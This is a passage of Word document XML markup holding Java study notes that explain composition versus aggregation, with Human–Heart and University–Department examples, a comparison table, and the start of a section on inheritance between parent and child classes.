            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CBF0685"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ia delegation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="276A097D"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ia method overriding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00302C47" w:rsidRPr="00CE4B95" w14:paraId="1979A5FA" w14:textId="77777777" w:rsidTr="009534B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15911213"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="796F1EB1"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r has an Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F96A8E" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C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og is an Animal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AE119DF" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00302C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CBFA9B3">
          <v:rect id="_x0000_i1319" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA66BD" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">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eal-world Analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C343BB3" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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uter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</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RAM</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Hard Drive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Composition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE3101B" w14:textId="77777777" w:rsidR="009534B5" w:rsidRPr="00CE4B95" w:rsidRDefault="009534B5" w:rsidP="00302C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each component works independently and can be replaced or upgraded without changing the entire Computer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4C1F4" w14:textId="153291F9" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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42F03BCA">
          <v:rect id="_x0000_i1320" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25EE62" w14:textId="626E6808" w:rsidR="00743C37" w:rsidRPr="00CE4B95" w:rsidRDefault="00743C37">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc196307596"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="00283099" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">omposition and </w:t>
      </w:r>
      <w:r w:rsidR="00283099" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ggregation?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="6E5D8500" w14:textId="4B11DFC3" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00F97754">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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mposition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C43D93" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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rong "has-a"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477AEB85" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ightly coupled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA3338" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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hild </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot exist without</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BC663" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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the parent is destroyed, the child is also destroyed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C766BAD" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE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160DB008"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Heart {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2626D0D7"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pump() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2688D8"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Heart is pumping...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735C9DE8"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322CC82"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90C818D" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD2CE65"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Human {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3544E02B"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Heart heart = new Heart(); // Composition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E58A58B" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D389C2"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live() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63589D28"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heart.pump();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599204E3"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Human is alive");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D24DE2"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C02B3A4"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EB25A91"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Human has a Heart</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — if the Human object is destroyed, the Heart has no meaning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B494B28" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EA0DE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F10708">
          <v:rect id="_x0000_i1321" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D53F9B" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE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Aggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F603BD" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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eak "has-a"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA28C1" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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osely coupled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA2557" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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hild </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can exist independently</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A776168" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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the parent is destroyed, the child can still exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0B4B6" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE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27819378"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Department {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310324E8"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ABA89A" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3470115C"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epartment(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56C219"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D612473"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2C05B26"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C2049A8"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University {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB691DE"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List&lt;Department&gt; departments;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3006B157" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCE1938"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University(List&lt;Department&gt; departments) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAA3F2C"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departments = departments;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A468647"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E9A1F0B"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9A5CD40"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>University has Departments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — but even if the University object is deleted, the Department objects can still exist elsewhere or be reused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BFEB96" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EA0DE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CA794D2">
          <v:rect id="_x0000_i1322" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BDC371" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE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84"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2561"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="118FCA6E" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BFF99BE" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE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47BA0A1B" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE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position</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47227FDB" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0DE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ggregation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="033A437E" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54559794"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lationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72A4FCC0"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ong "has-a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E8158D9"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eak "has-a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="69EF5EF4" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D3BF743"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upling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3089B1EA"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ightly coupled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7B300E"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osely coupled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="1A64D6A2" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F1A96A0"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fespan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A1145C0"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hild depends on parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63ADB77B"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hild independent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0DE3" w:rsidRPr="00CE4B95" w14:paraId="15396031" w14:textId="77777777" w:rsidTr="00046E8A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="298ABC60"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A697934"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uman has a Heart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B5BA0EC" w14:textId="77777777" w:rsidR="00046E8A" w:rsidRPr="00CE4B95" w:rsidRDefault="00046E8A" w:rsidP="00EA0D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niversity has Departments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="025A9995" w14:textId="37CC8431" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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434E8EE3">
          <v:rect id="_x0000_i1323" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD242B1" w14:textId="77777777" w:rsidR="00743C37" w:rsidRPr="00CE4B95" w:rsidRDefault="00743C37">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc196307597"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Parent and child class methods and how to access those?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="2716EC9E" w14:textId="77C93A76" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Inheritance Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358036F3"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a class (Child) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> another class (Parent), it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inherits</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> all non-private methods and variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C8E20B"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Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F948AB3"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show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4099D28A"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Parent method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EC5FB"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56E23D2"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D610FDF" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAABD06"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Child extends Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74224EF1"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display() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B637E"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hild method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7864C0FF"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C4CE9E0"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DB51E4D" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F7638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5D69885">
          <v:rect id="_x0000_i1324" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
